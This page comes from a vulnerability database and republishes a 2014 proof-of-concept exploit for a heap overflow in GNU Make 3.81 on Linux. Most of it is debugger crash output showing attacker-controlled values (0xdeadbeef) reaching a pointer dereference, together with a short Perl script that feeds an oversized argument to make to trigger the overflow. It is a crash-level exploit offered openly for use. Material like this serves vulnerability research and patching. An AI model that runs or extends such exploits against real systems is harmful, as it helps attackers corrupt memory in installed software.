Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Make 3.81 Heap Overflow

🗓️ 25 Jul 2014 00:00:00Reported by HyPType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 21 Views

Make 3.81 Heap Overflow POC for Linux X86 X6

Code
`# Exploit Title: MAKE Heap Overflow - Pointer dereferencing POC (Calloc)-X86 X64  
# Date: [14.07.14]  
# Exploit Author: HyP  
# Vendor Homepage: http://www.gnu.org/software/make/  
# Software Link: http://ftp.gnu.org/gnu/make/  
# Version: Make 3.81  
# Tested on: linux32,64 bits (Fedora,Debian,ubuntu,Arch)  
# CVE : none  
  
*******************************************************************************************  
Special Thanks:  
  
kmkz  
Zadyree  
Sec0d Team  
  
*******************************************************************************************  
*******************************************************************************************  
32bits  
  
  
./checksec.sh --file make  
RELRO STACK CANARY NX PIE RPATH  
RUNPATH FILE  
No RELRO No canary found NX enabled No PIE No RPATH  
No RUNPATH make  
  
  
gdb-peda$ r `perl -e 'print "A" x 4000 . "B"x96 . "\xef\xbe\xad\xde"x4'`  
  
  
Program received signal SIGSEGV, Segmentation fault.  
[----------------------------------registers-----------------------------------]  
...  
EAX: 0xdeadbeef  
EBX: 0x807b971 --> 0x6f2e ('.o')  
ECX: 0x0  
EDX: 0x1  
ESI: 0xdeadbeef  
EDI: 0x0  
EBP: 0xbfffc5e8 --> 0xbfffc698 --> 0x8081de0 --> 0x0  
ESP: 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')  
EIP: 0x80548b2 (mov eax,DWORD PTR [eax])  
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction  
overflow)  
[-------------------------------------code-------------------------------------]  
0x80548aa: je 0x80548b8  
0x80548ac: lea esi,[esi+eiz*1+0x0]  
0x80548b0: mov esi,eax  
=> 0x80548b2: mov eax,DWORD PTR [eax] <------ Pointer Dereferencing  
0x80548b4: test eax,eax  
0x80548b6: jne 0x80548b0  
0x80548b8: cmp DWORD PTR [ebp-0x1034],0x1  
0x80548bf: mov DWORD PTR [ebp-0x10ac],edx  
[------------------------------------stack-------------------------------------]  
0000| 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')  
0004| 0xbfffa314 --> 0x807b971 --> 0x6f2e ('.o')  
0008| 0xbfffa318 --> 0x2  
0012| 0xbfffa31c --> 0xb7ffadf8 ("symbol=%s; lookup in file=%s [%lu]\n")  
0016| 0xbfffa320 --> 0x0  
0020| 0xbfffa324 --> 0x0  
0024| 0xbfffa328 --> 0x0  
0028| 0xbfffa32c --> 0x0  
[------------------------------------------------------------------------------]  
Legend: code, data, rodata, value  
Stopped reason: SIGSEGV  
0x080548b2 in ?? ()  
  
  
Overflow code:  
...  
80548aa: 74 0c je 80548b8 <calloc@plt+0xac38>  
80548ac: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi  
80548b0: 89 c6 mov %eax,%esi  
80548b2: 8b 00 mov (%eax),%eax  
80548b4: 85 c0 test %eax,%eax  
80548b6: 75 f8 jne 80548b0 <calloc@plt+0xac30>  
...  
  
  
gdb-peda$ x/x $eax  
0x807ff68: 0x00000000  
  
peda vmmap  
Start End Perm Name  
0x08048000 0x0806f000 r-xp /root/Desktop/RESEARCH/make_BoF/make  
0x0806f000 0x08070000 rw-p /root/Desktop/RESEARCH/make_BoF/make  
  
0x08070000 0x08092000 rw-p [heap] // heap overflow !!  
  
  
  
*******************************************************************************************  
*******************************************************************************************  
64bits  
  
  
Overflow Code :  
40cc59: 74 10 je 40cc6b <__ctype_b_loc@plt+0xa52b>  
40cc5b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]  
40cc60: 48 89 c3 mov rbx,rax  
40cc63: 48 8b 00 mov rax,QWORD PTR [rax] // heap overflow  
  
  
Program received signal SIGSEGV, Segmentation fault.  
[----------------------------------registers-----------------------------------]  
RAX: 0xdeadbeefdeadbeef  
RBX: 0xdeadbeefdeadbeef  
RCX: 0x4242424242424242 ('BBBBBBBB')  
RDX: 0x0  
RSI: 0x7fffffff97d0 ('A' <repeats 200 times>...)  
RDI: 0x7fffffffa7e2 --> 0x732e656c69666500 ('')  
RBP: 0x7fffffffb930 --> 0x1  
RSP: 0x7fffffff95f0 --> 0x0  
RIP: 0x40cc63 (mov rax,QWORD PTR [rax])  
R8 : 0x4242424242424242 ('BBBBBBBB')  
R9 : 0x7ffff7972440 (mov dx,WORD PTR [rsi-0x2])  
R10: 0x4242424242424242 ('BBBBBBBB')  
R11: 0x7ffff799f990 --> 0xfffd28d0fffd2708  
R12: 0x1  
R13: 0x0  
R14: 0x6397a0 --> 0x6f2e25 ('%.o')  
R15: 0x0  
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction  
overflow)  
[-------------------------------------code-------------------------------------]  
0x40cc59: je 0x40cc6b  
0x40cc5b: nop DWORD PTR [rax+rax*1+0x0]  
0x40cc60: mov rbx,rax  
=> 0x40cc63: mov rax,QWORD PTR [rax] <----- Pointer dereferencing  
0x40cc66: test rax,rax  
0x40cc69: jne 0x40cc60  
0x40cc6b: cmp DWORD PTR [rbp-0x105c],0x1  
0x40cc72: lea rdi,[rbp-0x40]  
[------------------------------------stack-------------------------------------]  
0000| 0x7fffffff95f0 --> 0x0  
0008| 0x7fffffff95f8 --> 0x0  
0016| 0x7fffffff9600 --> 0x0  
0024| 0x7fffffff9608 --> 0x645e50 --> 0x646630 --> 0x64667b -->  
0x5f7266006362696c ('libc')  
0032| 0x7fffffff9610 --> 0xffffffdf  
0040| 0x7fffffff9618 --> 0x645e58 --> 0x6462f0 --> 0x64a500 --> 0x64a541  
--> 0x5f726600656b616d ('make')  
0048| 0x7fffffff9620 --> 0x7ffff7bd01f8 --> 0x645e50 --> 0x646630 -->  
0x64667b --> 0x5f7266006362696c ('libc')  
0056| 0x7fffffff9628 --> 0x0  
[------------------------------------------------------------------------------]  
Legend: code, data, rodata, value  
Stopped reason: SIGSEGV  
0x000000000040cc63 in ?? ()  
  
  
  
*******************************************************************************************  
*******************************************************************************************  
Proof of Concept - Source code  
*******************************************************************************************  
*******************************************************************************************  
=cut  
  
#!/usr/bin/perl  
  
use 5.010;  
use strict;  
use warnings;  
say "Please set ulimit value to 1000 before (ulimit -c 1000) ";  
sleep 0.5;  
  
  
my $buff = "A"x 4096 ;  
my $addr = "\xef\xbe\xad\xde";  
my $make = "./make";  
my $gdb = "gdb --core core";  
my $PAYLOAD= (`perl -e 'print "$buff" . "$addr" '`);  
  
my $exec= qx($make $PAYLOAD);  
  
say " Reading Core file GDB ";  
sleep 0.5;  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Jul 2014 00:00Current
0.5Low risk
Vulners AI Score0.5
make 3.81heap overflowlinux
21